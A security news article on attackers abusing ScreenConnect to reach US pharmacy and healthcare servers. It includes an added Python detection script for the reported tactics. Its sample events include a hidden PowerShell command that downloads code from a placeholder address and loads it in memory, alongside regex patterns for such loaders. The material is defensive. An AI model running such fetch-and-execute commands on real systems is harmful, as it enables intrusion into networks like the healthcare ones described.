ScreenConnect Abuse: Hackers Leverage Remote Access Tool for Healthcare Intrusion
Huntress has uncovered a series of cyberattacks targeting several healthcare organizations in the United States. The attacks focus on the ScreenConnect remote access systems, widely used in the healthcare sector.
The central element of these attacks is the exploitation of the infrastructure of Transaction Data Systems (TDS), which provides management and supply systems for pharmacies and operates in all 50 states of the U.S. According to Huntress, the cyber criminals utilized local instances of ScreenConnect embedded in TDS systems to carry out their attacks.
Huntress experts detected malicious activity on endpoints within two distinct medical organizations. They also noted preparatory actions by the hackers aimed at expanding the scope of the attack, including the installation of additional remote access tools such as ScreenConnect or AnyDesk to maintain persistent access to the networks.
The methodology of the attacks has drawn particular attention: researchers found the same tactics, techniques, and procedures (TTPs) in each incident. For example, in each case a text.xml file containing C# code was downloaded through PowerShell; that code loads the Meterpreter payload directly into memory rather than onto disk, evading detection. The use of the print service to launch additional processes was also recorded.
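The three observations above (a second remote access tool being installed for persistence, PowerShell fetching a text.xml file and loading its C# payload in memory, and the print service spawning processes) map naturally onto process-creation telemetry. The following detection logic is an added example written for this article, not Huntress tooling or anything from the report: the event fields are modelled on Sysmon process-creation records, the sample events and the 203.0.113.10 address are constructed, and the binary names, regular expressions and parent/child relationships the rules key on are assumptions a defender would tune to their own environment. It generalises the page's three indicators into reusable rules that can be run over any event stream with the same fields.

```python
"""Process-creation rules for the TTPs described in the article.

Added example, not the report's own code. All events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (fields modelled on Sysmon Event ID 1)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Interpreters and script hosts that the print spooler has no business launching (assumed list).
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
               "cscript.exe", "mshta.exe", "rundll32.exe"}

# Cmdlets/classes commonly used to pull remote content, and in-memory compile/load primitives.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
INMEM_RE = re.compile(r"add-type|assembly\]::load", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules compare image names not paths."""
    return path.rsplit("\\", 1)[-1].lower()


def rmm_family(image_name: str) -> Optional[str]:
    """Classify a binary into a remote-access tool family (substring match, assumed)."""
    if "anydesk" in image_name:
        return "anydesk"
    if "screenconnect" in image_name:
        return "screenconnect"
    return None


def rule_spooler_child(ev: ProcEvent) -> Optional[str]:
    """Print spooler (spoolsv.exe) spawning a command interpreter or script host."""
    if basename(ev.parent_image) == "spoolsv.exe" and basename(ev.image) in SHELL_HOSTS:
        return "print spooler spawned a command interpreter"
    return None


def rule_inmemory_loader(ev: ProcEvent) -> Optional[str]:
    """PowerShell that both fetches remote content and compiles/loads it in memory."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if DOWNLOAD_RE.search(ev.command_line) and INMEM_RE.search(ev.command_line):
        return "PowerShell fetched remote content and loaded it in memory"
    return None


def rule_second_rmm(ev: ProcEvent) -> Optional[str]:
    """A remote-access tool launched from a shell, or from a *different* RMM tool's session."""
    fam = rmm_family(basename(ev.image))
    if fam is None:
        return None
    parent = basename(ev.parent_image)
    parent_fam = rmm_family(parent)
    if parent in SHELL_HOSTS or (parent_fam is not None and parent_fam != fam):
        return f"{fam} launched from {parent} (possible additional persistence tool)"
    return None


RULES = [rule_spooler_child, rule_inmemory_loader, rule_second_rmm]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Run every rule over every event; return (host, rule name, reason) for each hit."""
    findings = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                findings.append((ev.host, rule.__name__, reason))
    return findings


# Constructed sample events: three hits interleaved with three benign look-alikes.
SC_SERVICE = r"C:\Program Files (x86)\ScreenConnect Client (EXAMPLEID)\ScreenConnect.ClientService.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("PHARM-SRV01", r"C:\Windows\System32\spoolsv.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("PHARM-SRV01", r"C:\Windows\System32\spoolsv.exe",
              r"C:\Windows\splwow64.exe", "splwow64.exe"),  # normal spooler child
    ProcEvent("CLINIC-SRV02", SC_SERVICE, PS,
              "powershell.exe -nop -w hidden -c \"$c=(New-Object Net.WebClient)"
              ".DownloadString('http://203.0.113.10/text.xml'); Add-Type -TypeDefinition $c\""),
    ProcEvent("CLINIC-SRV02", r"C:\Windows\explorer.exe", PS,
              "powershell.exe Get-Service -Name Spooler"),  # benign admin use
    ProcEvent("PHARM-SRV01", r"C:\Windows\System32\cmd.exe",
              r"C:\Users\svc_pharm\AppData\Local\Temp\AnyDesk.exe", "AnyDesk.exe --install"),
    ProcEvent("PHARM-SRV01", SC_SERVICE,
              r"C:\Program Files (x86)\ScreenConnect Client (EXAMPLEID)\ScreenConnect.WindowsClient.exe",
              "ScreenConnect.WindowsClient.exe"),  # same tool family: expected
]

if __name__ == "__main__":
    for host, rule, reason in evaluate(SAMPLE_EVENTS):
        print(f"{host}: [{rule}] {reason}")
```

Each rule is deliberately narrow: the in-memory loader rule requires both a fetch and a compile/load primitive in one command line so routine `Invoke-WebRequest` use does not fire, and the RMM rule ignores a tool spawning its own components (ScreenConnect's service launching its client) while still catching a second tool being stood up from a shell or from within an existing ScreenConnect session.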
The hackers focused on endpoints operating on Windows Server 2019, belonging to two different organizations – one in the pharmaceutical industry, and another in healthcare. A common link between them was the installation of ScreenConnect.
Currently, it remains unclear whether TDS was compromised or if this is a result of credential leakage. This ambiguity adds to concerns, as uncertainty in such cases can lead to additional risks for medical institutions and their patients.